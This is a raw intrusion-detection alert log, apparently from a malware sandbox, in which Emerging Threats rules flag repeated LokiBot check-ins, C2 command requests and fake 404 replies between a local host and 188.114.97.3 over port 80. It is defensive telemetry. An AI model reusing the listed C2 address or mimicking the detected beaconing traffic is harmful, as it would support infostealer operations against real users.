              2024-09-25T10:20:14.393221+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749776188.114.97.380TCP
              2024-09-25T10:20:14.393221+02002025381ET MALWARE LokiBot Checkin1192.168.2.749776188.114.97.380TCP
              2024-09-25T10:20:14.393221+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749776188.114.97.380TCP
              2024-09-25T10:20:15.051935+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749776188.114.97.380TCP
              2024-09-25T10:20:15.051935+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749776188.114.97.380TCP
              2024-09-25T10:20:15.056810+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749776TCP
              2024-09-25T10:20:15.204070+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749777188.114.97.380TCP
              2024-09-25T10:20:15.204070+02002025381ET MALWARE LokiBot Checkin1192.168.2.749777188.114.97.380TCP
              2024-09-25T10:20:15.204070+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749777188.114.97.380TCP
              2024-09-25T10:20:15.897467+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749777188.114.97.380TCP
              2024-09-25T10:20:15.897467+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749777188.114.97.380TCP
              2024-09-25T10:20:15.902727+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749777TCP
              2024-09-25T10:20:16.046849+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749778188.114.97.380TCP
              2024-09-25T10:20:16.046849+02002025381ET MALWARE LokiBot Checkin1192.168.2.749778188.114.97.380TCP
              2024-09-25T10:20:16.046849+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749778188.114.97.380TCP
              2024-09-25T10:20:16.724336+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749778188.114.97.380TCP
              2024-09-25T10:20:16.724336+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749778188.114.97.380TCP
              2024-09-25T10:20:16.729213+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749778TCP
              2024-09-25T10:20:16.874999+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749779188.114.97.380TCP
              2024-09-25T10:20:16.874999+02002025381ET MALWARE LokiBot Checkin1192.168.2.749779188.114.97.380TCP
              2024-09-25T10:20:16.874999+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749779188.114.97.380TCP
              2024-09-25T10:20:17.550653+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749779188.114.97.380TCP
              2024-09-25T10:20:17.550653+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749779188.114.97.380TCP
              2024-09-25T10:20:17.555476+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749779TCP
              2024-09-25T10:20:17.701124+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749780188.114.97.380TCP
              2024-09-25T10:20:17.701124+02002025381ET MALWARE LokiBot Checkin1192.168.2.749780188.114.97.380TCP
              2024-09-25T10:20:17.701124+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749780188.114.97.380TCP
              2024-09-25T10:20:18.430421+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749780188.114.97.380TCP
              2024-09-25T10:20:18.430421+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749780188.114.97.380TCP
              2024-09-25T10:20:18.436115+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749780TCP
              2024-09-25T10:20:18.577128+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749781188.114.97.380TCP
              2024-09-25T10:20:18.577128+02002025381ET MALWARE LokiBot Checkin1192.168.2.749781188.114.97.380TCP
              2024-09-25T10:20:18.577128+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749781188.114.97.380TCP
              2024-09-25T10:20:19.235882+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749781188.114.97.380TCP
              2024-09-25T10:20:19.235882+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749781188.114.97.380TCP
              2024-09-25T10:20:19.242304+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749781TCP
              2024-09-25T10:20:19.388646+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749782188.114.97.380TCP
              2024-09-25T10:20:19.388646+02002025381ET MALWARE LokiBot Checkin1192.168.2.749782188.114.97.380TCP
              2024-09-25T10:20:19.388646+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749782188.114.97.380TCP
              2024-09-25T10:20:20.044297+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749782188.114.97.380TCP
              2024-09-25T10:20:20.044297+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749782188.114.97.380TCP
              2024-09-25T10:20:20.049175+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749782TCP
              2024-09-25T10:20:20.429528+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749783188.114.97.380TCP
              2024-09-25T10:20:20.429528+02002025381ET MALWARE LokiBot Checkin1192.168.2.749783188.114.97.380TCP
              2024-09-25T10:20:20.429528+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749783188.114.97.380TCP
              2024-09-25T10:20:21.084561+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749783188.114.97.380TCP
              2024-09-25T10:20:21.084561+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749783188.114.97.380TCP
              2024-09-25T10:20:21.089402+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749783TCP
              2024-09-25T10:20:21.233233+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749784188.114.97.380TCP
              2024-09-25T10:20:21.233233+02002025381ET MALWARE LokiBot Checkin1192.168.2.749784188.114.97.380TCP
              2024-09-25T10:20:21.233233+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749784188.114.97.380TCP
              2024-09-25T10:20:21.896883+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749784188.114.97.380TCP
              2024-09-25T10:20:21.896883+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749784188.114.97.380TCP
              2024-09-25T10:20:21.901715+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749784TCP
              2024-09-25T10:20:22.045367+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749785188.114.97.380TCP
              2024-09-25T10:20:22.045367+02002025381ET MALWARE LokiBot Checkin1192.168.2.749785188.114.97.380TCP
              2024-09-25T10:20:22.045367+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749785188.114.97.380TCP
              2024-09-25T10:20:22.717675+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749785188.114.97.380TCP
              2024-09-25T10:20:22.717675+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749785188.114.97.380TCP
              2024-09-25T10:20:22.722686+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749785TCP
              2024-09-25T10:20:22.876653+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749786188.114.97.380TCP
              2024-09-25T10:20:22.876653+02002025381ET MALWARE LokiBot Checkin1192.168.2.749786188.114.97.380TCP
              2024-09-25T10:20:22.876653+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749786188.114.97.380TCP
              2024-09-25T10:20:23.537060+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749786188.114.97.380TCP
              2024-09-25T10:20:23.537060+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749786188.114.97.380TCP
              2024-09-25T10:20:23.542018+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749786TCP
              2024-09-25T10:20:23.686182+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749787188.114.97.380TCP
              2024-09-25T10:20:23.686182+02002025381ET MALWARE LokiBot Checkin1192.168.2.749787188.114.97.380TCP
              2024-09-25T10:20:23.686182+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749787188.114.97.380TCP
              2024-09-25T10:20:24.398012+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749787188.114.97.380TCP
              2024-09-25T10:20:24.398012+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749787188.114.97.380TCP
              2024-09-25T10:20:24.402809+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749787TCP
              2024-09-25T10:20:24.545070+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749788188.114.97.380TCP
              2024-09-25T10:20:24.545070+02002025381ET MALWARE LokiBot Checkin1192.168.2.749788188.114.97.380TCP
              2024-09-25T10:20:24.545070+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749788188.114.97.380TCP
              2024-09-25T10:20:25.366305+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749788188.114.97.380TCP
              2024-09-25T10:20:25.366305+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749788188.114.97.380TCP
              2024-09-25T10:20:25.371419+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749788TCP
              2024-09-25T10:20:25.516198+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749789188.114.97.380TCP
              2024-09-25T10:20:25.516198+02002025381ET MALWARE LokiBot Checkin1192.168.2.749789188.114.97.380TCP
              2024-09-25T10:20:25.516198+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749789188.114.97.380TCP
              2024-09-25T10:20:26.202166+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749789188.114.97.380TCP
              2024-09-25T10:20:26.202166+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749789188.114.97.380TCP
              2024-09-25T10:20:26.208265+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749789TCP
              2024-09-25T10:20:26.367186+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749790188.114.97.380TCP
              2024-09-25T10:20:26.367186+02002025381ET MALWARE LokiBot Checkin1192.168.2.749790188.114.97.380TCP
              2024-09-25T10:20:26.367186+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749790188.114.97.380TCP
              2024-09-25T10:20:27.025481+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749790188.114.97.380TCP
              2024-09-25T10:20:27.025481+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749790188.114.97.380TCP
              2024-09-25T10:20:27.030372+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749790TCP
              2024-09-25T10:20:27.187595+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749791188.114.97.380TCP
              2024-09-25T10:20:27.187595+02002025381ET MALWARE LokiBot Checkin1192.168.2.749791188.114.97.380TCP
              2024-09-25T10:20:27.187595+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749791188.114.97.380TCP
              2024-09-25T10:20:27.837448+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749791188.114.97.380TCP
              2024-09-25T10:20:27.837448+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749791188.114.97.380TCP
              2024-09-25T10:20:27.842255+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749791TCP
              2024-09-25T10:20:28.005117+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749792188.114.97.380TCP
              2024-09-25T10:20:28.005117+02002025381ET MALWARE LokiBot Checkin1192.168.2.749792188.114.97.380TCP
              2024-09-25T10:20:28.005117+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749792188.114.97.380TCP
              2024-09-25T10:20:28.650735+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749792188.114.97.380TCP
              2024-09-25T10:20:28.650735+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749792188.114.97.380TCP
              2024-09-25T10:20:28.655543+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749792TCP
              2024-09-25T10:20:28.823348+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749793188.114.97.380TCP
              2024-09-25T10:20:28.823348+02002025381ET MALWARE LokiBot Checkin1192.168.2.749793188.114.97.380TCP
              2024-09-25T10:20:28.823348+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749793188.114.97.380TCP
              2024-09-25T10:20:29.642863+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749793188.114.97.380TCP
              2024-09-25T10:20:29.642863+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749793188.114.97.380TCP
              2024-09-25T10:20:29.647628+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749793TCP
              2024-09-25T10:20:29.793057+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749794188.114.97.380TCP
              2024-09-25T10:20:29.793057+02002025381ET MALWARE LokiBot Checkin1192.168.2.749794188.114.97.380TCP
              2024-09-25T10:20:29.793057+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749794188.114.97.380TCP
              2024-09-25T10:20:30.571474+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749794188.114.97.380TCP
              2024-09-25T10:20:30.571474+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749794188.114.97.380TCP
              2024-09-25T10:20:30.576547+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749794TCP
              2024-09-25T10:20:30.724248+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749795188.114.97.380TCP
              2024-09-25T10:20:30.724248+02002025381ET MALWARE LokiBot Checkin1192.168.2.749795188.114.97.380TCP
              2024-09-25T10:20:30.724248+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749795188.114.97.380TCP
              2024-09-25T10:20:31.377167+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749795188.114.97.380TCP
              2024-09-25T10:20:31.377167+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749795188.114.97.380TCP
              2024-09-25T10:20:31.382078+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749795TCP
              2024-09-25T10:20:31.529840+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749796188.114.97.380TCP
              2024-09-25T10:20:31.529840+02002025381ET MALWARE LokiBot Checkin1192.168.2.749796188.114.97.380TCP
              2024-09-25T10:20:31.529840+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749796188.114.97.380TCP
              2024-09-25T10:20:32.191160+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749796188.114.97.380TCP
              2024-09-25T10:20:32.191160+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749796188.114.97.380TCP
              2024-09-25T10:20:32.195932+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749796TCP
              2024-09-25T10:20:32.349270+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749797188.114.97.380TCP
              2024-09-25T10:20:32.349270+02002025381ET MALWARE LokiBot Checkin1192.168.2.749797188.114.97.380TCP
              2024-09-25T10:20:32.349270+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749797188.114.97.380TCP
              2024-09-25T10:20:33.000475+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749797188.114.97.380TCP
              2024-09-25T10:20:33.000475+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749797188.114.97.380TCP
              2024-09-25T10:20:33.006817+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749797TCP
              2024-09-25T10:20:33.159073+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749798188.114.97.380TCP
              2024-09-25T10:20:33.159073+02002025381ET MALWARE LokiBot Checkin1192.168.2.749798188.114.97.380TCP
              2024-09-25T10:20:33.159073+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749798188.114.97.380TCP
              2024-09-25T10:20:33.843258+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749798188.114.97.380TCP
              2024-09-25T10:20:33.843258+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749798188.114.97.380TCP
              2024-09-25T10:20:33.848087+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749798TCP
              2024-09-25T10:20:34.004751+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749799188.114.97.380TCP
              2024-09-25T10:20:34.004751+02002025381ET MALWARE LokiBot Checkin1192.168.2.749799188.114.97.380TCP
              2024-09-25T10:20:34.004751+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749799188.114.97.380TCP
              2024-09-25T10:20:34.678916+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749799188.114.97.380TCP
              2024-09-25T10:20:34.678916+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749799188.114.97.380TCP
              2024-09-25T10:20:34.683975+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749799TCP
              2024-09-25T10:20:34.831696+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749800188.114.97.380TCP
              2024-09-25T10:20:34.831696+02002025381ET MALWARE LokiBot Checkin1192.168.2.749800188.114.97.380TCP
              2024-09-25T10:20:34.831696+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749800188.114.97.380TCP
              2024-09-25T10:20:35.509847+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749800188.114.97.380TCP
              2024-09-25T10:20:35.509847+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749800188.114.97.380TCP
              2024-09-25T10:20:35.514687+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749800TCP
              2024-09-25T10:20:35.676731+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749801188.114.97.380TCP
              2024-09-25T10:20:35.676731+02002025381ET MALWARE LokiBot Checkin1192.168.2.749801188.114.97.380TCP
              2024-09-25T10:20:35.676731+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749801188.114.97.380TCP
              2024-09-25T10:20:36.333409+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749801188.114.97.380TCP
              2024-09-25T10:20:36.333409+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749801188.114.97.380TCP
              2024-09-25T10:20:36.338191+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749801TCP
              2024-09-25T10:20:36.488105+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749802188.114.97.380TCP
              2024-09-25T10:20:36.488105+02002025381ET MALWARE LokiBot Checkin1192.168.2.749802188.114.97.380TCP
              2024-09-25T10:20:36.488105+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749802188.114.97.380TCP
              2024-09-25T10:20:37.192021+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749802188.114.97.380TCP
              2024-09-25T10:20:37.192021+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749802188.114.97.380TCP
              2024-09-25T10:20:37.196799+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749802TCP
              2024-09-25T10:20:37.347438+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749803188.114.97.380TCP
              2024-09-25T10:20:37.347438+02002025381ET MALWARE LokiBot Checkin1192.168.2.749803188.114.97.380TCP
              2024-09-25T10:20:37.347438+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749803188.114.97.380TCP
              2024-09-25T10:20:38.012160+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749803188.114.97.380TCP
              2024-09-25T10:20:38.012160+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749803188.114.97.380TCP
              2024-09-25T10:20:38.018123+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749803TCP
              2024-09-25T10:20:38.170705+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749804188.114.97.380TCP
              2024-09-25T10:20:38.170705+02002025381ET MALWARE LokiBot Checkin1192.168.2.749804188.114.97.380TCP
              2024-09-25T10:20:38.170705+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749804188.114.97.380TCP
              2024-09-25T10:20:38.830735+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749804188.114.97.380TCP
              2024-09-25T10:20:38.830735+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749804188.114.97.380TCP
              2024-09-25T10:20:38.835742+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749804TCP
              2024-09-25T10:20:38.983344+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749805188.114.97.380TCP
              2024-09-25T10:20:38.983344+02002025381ET MALWARE LokiBot Checkin1192.168.2.749805188.114.97.380TCP
              2024-09-25T10:20:38.983344+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749805188.114.97.380TCP
              2024-09-25T10:20:39.656614+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749805188.114.97.380TCP
              2024-09-25T10:20:39.656614+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749805188.114.97.380TCP
              2024-09-25T10:20:39.661421+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749805TCP
              2024-09-25T10:20:39.812510+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749806188.114.97.380TCP
              2024-09-25T10:20:39.812510+02002025381ET MALWARE LokiBot Checkin1192.168.2.749806188.114.97.380TCP
              2024-09-25T10:20:39.812510+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749806188.114.97.380TCP
              2024-09-25T10:20:40.523719+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749806188.114.97.380TCP
              2024-09-25T10:20:40.523719+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749806188.114.97.380TCP
              2024-09-25T10:20:40.528482+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749806TCP
              2024-09-25T10:20:40.679656+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749807188.114.97.380TCP
              2024-09-25T10:20:40.679656+02002025381ET MALWARE LokiBot Checkin1192.168.2.749807188.114.97.380TCP
              2024-09-25T10:20:40.679656+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749807188.114.97.380TCP
              2024-09-25T10:20:41.372812+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749807188.114.97.380TCP
              2024-09-25T10:20:41.372812+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749807188.114.97.380TCP
              2024-09-25T10:20:41.378361+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749807TCP
              2024-09-25T10:20:41.532089+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749808188.114.97.380TCP
              2024-09-25T10:20:41.532089+02002025381ET MALWARE LokiBot Checkin1192.168.2.749808188.114.97.380TCP
              2024-09-25T10:20:41.532089+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749808188.114.97.380TCP
              2024-09-25T10:20:42.248861+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749808188.114.97.380TCP
              2024-09-25T10:20:42.248861+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749808188.114.97.380TCP
              2024-09-25T10:20:42.253717+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749808TCP
              2024-09-25T10:20:42.407099+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749809188.114.97.380TCP
              2024-09-25T10:20:42.407099+02002025381ET MALWARE LokiBot Checkin1192.168.2.749809188.114.97.380TCP
              2024-09-25T10:20:42.407099+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749809188.114.97.380TCP
              2024-09-25T10:20:43.045056+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749809188.114.97.380TCP
              2024-09-25T10:20:43.045056+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749809188.114.97.380TCP
              2024-09-25T10:20:43.050099+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749809TCP
              2024-09-25T10:20:43.201046+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749810188.114.97.380TCP
              2024-09-25T10:20:43.201046+02002025381ET MALWARE LokiBot Checkin1192.168.2.749810188.114.97.380TCP
              2024-09-25T10:20:43.201046+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749810188.114.97.380TCP
              2024-09-25T10:20:43.854654+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749810188.114.97.380TCP
              2024-09-25T10:20:43.854654+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749810188.114.97.380TCP
              2024-09-25T10:20:43.859419+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749810TCP
              2024-09-25T10:20:44.020697+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749811188.114.97.380TCP
              2024-09-25T10:20:44.020697+02002025381ET MALWARE LokiBot Checkin1192.168.2.749811188.114.97.380TCP
              2024-09-25T10:20:44.020697+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749811188.114.97.380TCP
              2024-09-25T10:20:44.684574+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749811188.114.97.380TCP
              2024-09-25T10:20:44.684574+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749811188.114.97.380TCP
              2024-09-25T10:20:44.689401+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749811TCP
              2024-09-25T10:20:44.843940+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749812188.114.97.380TCP
              2024-09-25T10:20:44.843940+02002025381ET MALWARE LokiBot Checkin1192.168.2.749812188.114.97.380TCP
              2024-09-25T10:20:44.843940+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749812188.114.97.380TCP
              2024-09-25T10:20:45.503133+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749812188.114.97.380TCP
              2024-09-25T10:20:45.503133+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749812188.114.97.380TCP
              2024-09-25T10:20:45.510355+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749812TCP
              2024-09-25T10:20:45.767835+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749813188.114.97.380TCP
              2024-09-25T10:20:45.767835+02002025381ET MALWARE LokiBot Checkin1192.168.2.749813188.114.97.380TCP
              2024-09-25T10:20:45.767835+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749813188.114.97.380TCP
              2024-09-25T10:20:46.424917+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749813188.114.97.380TCP
              2024-09-25T10:20:46.424917+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749813188.114.97.380TCP
              2024-09-25T10:20:46.432138+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749813TCP
              2024-09-25T10:20:46.581998+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749814188.114.97.380TCP
              2024-09-25T10:20:46.581998+02002025381ET MALWARE LokiBot Checkin1192.168.2.749814188.114.97.380TCP
              2024-09-25T10:20:46.581998+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749814188.114.97.380TCP
              2024-09-25T10:20:47.222041+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.749814188.114.97.380TCP
              2024-09-25T10:20:47.222041+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.749814188.114.97.380TCP
              2024-09-25T10:20:47.227872+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.97.380192.168.2.749814TCP
              2024-09-25T10:20:47.383984+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.749815188.114.97.380TCP
              2024-09-25T10:20:47.383984+02002025381ET MALWARE LokiBot Checkin1192.168.2.749815188.114.97.380TCP
              2024-09-25T10:20:47.383984+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.749815188.114.97.380TCP
